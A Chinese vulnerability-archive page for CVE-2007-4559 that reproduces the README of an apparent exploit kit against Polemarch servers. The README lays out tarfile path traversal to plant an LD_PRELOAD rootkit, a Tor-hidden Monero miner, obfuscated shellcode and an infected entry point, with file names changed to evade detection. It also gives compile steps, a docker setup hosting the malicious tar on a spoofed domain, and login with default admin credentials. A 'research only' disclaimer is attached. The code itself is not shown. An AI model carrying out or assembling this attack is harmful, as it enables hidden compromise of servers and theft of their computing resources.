关联漏洞
标题:
Python tarfile 模块路径遍历漏洞
(CVE-2007-4559)
描述:Python是Python基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平台等特点。 Python tarfile模块中的(1)extract和(2)extractall函数存在路径遍历漏洞,该漏洞允许用户辅助远程攻击者通过..TAR存档文件中文件名中的(dot dot)序列,该漏洞与CVE-2001-1267相关。
描述
CVE-2007-4559 - Polemarch exploit
介绍
# CVE-2007-4559 - Polemarch exploit
Full working exploit for Polemarch server https://www.polemarch.org/, using CVE-2007-4559, allowing:
- Injection of a cryptominer for monero using TOR for better hiding.
- Injection of a rootkit targeting most common sysadmin tools.
## POC
Proof of concept using https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4559
and based on the work from https://www.trellix.com/en-us/about/newsroom/stories/research/tarfile-exploiting-the-world.html.
### Directories to attack
We want to be able to deploy the following files into a Polemarch server:
- /usr/local/lib
- -> **rootkit.so**: library to do the preloading
- /etc
- -> **ld.so.preload**: loader configuration file
- /opt/polemarch/bin
- -> **polemarchctl**: infected docker entry point
- /usr/bin
- -> **xmring**: miner
- -> **tor**: tor
- -> **shellcode**: obfuscated shellcode responsible for starting the miner and tor
Note: in the real exploit we would change some names to avoid detection.
### Notes
- Binary files MUST have executable permissions
- Tar's can not be deployed twice
- Malware will be placed in an auxiliar folder which will be symlinked to target folder
## Instructions
In order to deploy the malware we will have to set up the following:
- Compilation of necessary binaries
- Set up Polemarch server and malicious server hosting infected tar
- Upload infected tar into Polemarch server
## Compile binaries
We will need to compile the rootkit shared library and the shellcode:
```bash
$(rootkit): make
$(shellcode): gcc -z execstack -m32 -o shellcode shell.c
```
## Polemarch server and malicious server
We have created a docker-compose which will:
- Set up a vulnerable Polemarch server at http://localhost:8080
- Generate an infected tar with all the necessary files
- Set up an auxiliary python server hosting the malicous tar at http://energyplus.com/project.tar.gz (only accessible from the docker)
```bash
$: docker compose build
$: docker compose up -d
```
## Upload infected tar
Log in to the polemarch server using default password (admin/admin) and
create a project with the compromised tar file:
Now, next time the docker is `restarted`, the miner and tor will be executed into the polemarh server.
## Disclaimer
This project is for research purposes only and should not be used for any illegal or malicious activities. The creators of this project are not responsible for any harm or damage caused by the misuse of this software.
文件快照
[4.0K] /data/pocs/c8ff4f53d44d564ed80ab55fbf1c5021b3faa263
├── [4.0K] cryptominer
│ ├── [ 522] config.json.default
│ ├── [2.2K] README.md
│ ├── [ 141] SHA256SUMS
│ ├── [ 21M] tor
│ └── [6.7M] xmrig
├── [ 357] docker-compose.yml
├── [1.2K] Dockerfile
├── [4.0K] docs
│ └── [ 13K] DOCS.md
├── [4.0K] phishing
│ ├── [4.0K] Energy_Plus_Test
│ │ ├── [ 317] ifconfig.yml
│ │ ├── [ 61] ping.yml
│ │ ├── [ 438] prepare_nodes.yml
│ │ ├── [ 445] README.md
│ │ └── [ 366] update.yml
│ └── [1.3K] README.md
├── [4.0K] poc
│ ├── [ 25] ld.so.preload
│ ├── [ 545] polemarchctl
│ ├── [ 456] README.md
│ ├── [ 162] shellcode.py
│ ├── [4.0K] tar
│ └── [2.6K] tar.py
├── [1.3K] provision-docker.sh
├── [2.6K] provision-vagrant.sh
├── [2.6K] README.md
├── [4.0K] rootkit
│ ├── [ 128] Makefile
│ └── [ 15K] rootkit.c
├── [4.0K] shellcode
│ ├── [ 525] README.md
│ └── [2.1K] shell.c
├── [1.8K] STORY.md
└── [2.9K] Vagrantfile
8 directories, 28 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。